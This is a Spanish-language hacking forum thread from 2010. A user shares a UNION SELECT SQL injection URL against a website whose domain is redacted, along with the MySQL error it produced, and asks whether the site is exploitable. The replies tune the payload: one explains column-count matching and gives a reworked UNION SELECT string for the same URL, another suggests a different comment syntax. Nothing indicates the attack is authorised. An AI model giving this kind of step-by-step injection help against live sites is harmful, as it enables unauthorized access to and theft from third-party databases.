elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [Ayuda]MySql injection.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ayuda]MySql injection.  (Leído 2,409 veces)
PHAMTOM

Desconectado Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF


Ver Perfil
[Ayuda]MySql injection.
« en: 12 Agosto 2010, 04:43 am »

Buenas tengo una pagina,que me tiro error al hacer una consulta.

http://xxxx.xx/index.php?not=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%E7&idc=38&p=1

el error es


No se pudo ejecutar la consulta

SELECT not_id,not_fecha,not_titulo,not_imagen,not_contenido,not_enlace FROM ptc_noticias WHERE not_id=-1 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--ç ORDER BY not_fecha

Error MySQL: : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ç ORDER BY not_fecha' at line 1

-----------------

Esta pagina es vulnerable a mysqlinject ? , una vez que termine de concactenar todas las columnas podre seguir como una inyeccion normal, ?? o asi no llegare a nada.salu2
En línea

Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: [Ayuda]MySql injection.
« Respuesta #1 en: 12 Agosto 2010, 05:25 am »

A ver, hasta donde sé, si no me equivoco. Al unir un SELECT con otro SELECT, se necesita tener los mismos campos que el primer SELECT. Es decir,
Código
  1. SELECT id, nombre, email FROM tbl_usuarios WHERE id = -1 UNION ALL SELECT 1, 2, 3--
El resultado sería:
Código:
id nombre email
1 2 3

Si se incluye ', 4' dentro del segundo SELECT, aparecería
Código
  1. SELECT id, nombre, email FROM tbl_usuarios WHERE id = -1 UNION ALL SELECT 1, 2, 3, 4--
  2. #1222 - The used SELECT statements have a different NUMBER OF COLUMNS

Lo otro, no entiendo del porque el ORDER BY not_fecha, esta allí donde lo tienes, xD. Nisiquiera esta en el contexto de la query, y si está, estaría como comentario.

___________
PD: Intentad así,
Código
  1. -1+UNION+SELECT+1,2,3,4,5,6--&idc=38&p=1
« Última modificación: 12 Agosto 2010, 05:33 am por Shell Root » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: [Ayuda]MySql injection.
« Respuesta #2 en: 18 Agosto 2010, 13:57 pm »

parece un residuo de la anterior query, prueba a comentar el final con \* en vez de con --
En línea

Colaboraciones:
1 2
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sql Injection logs (MySQL)
Nivel Web
Ambr0si0 2 4,024 Último mensaje 6 Abril 2011, 09:52 am
por Ambr0si0
Error Mysql 1222 en sql injection
Hacking
eL_iNdIo 0 2,324 Último mensaje 15 Mayo 2017, 17:31 pm
por eL_iNdIo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines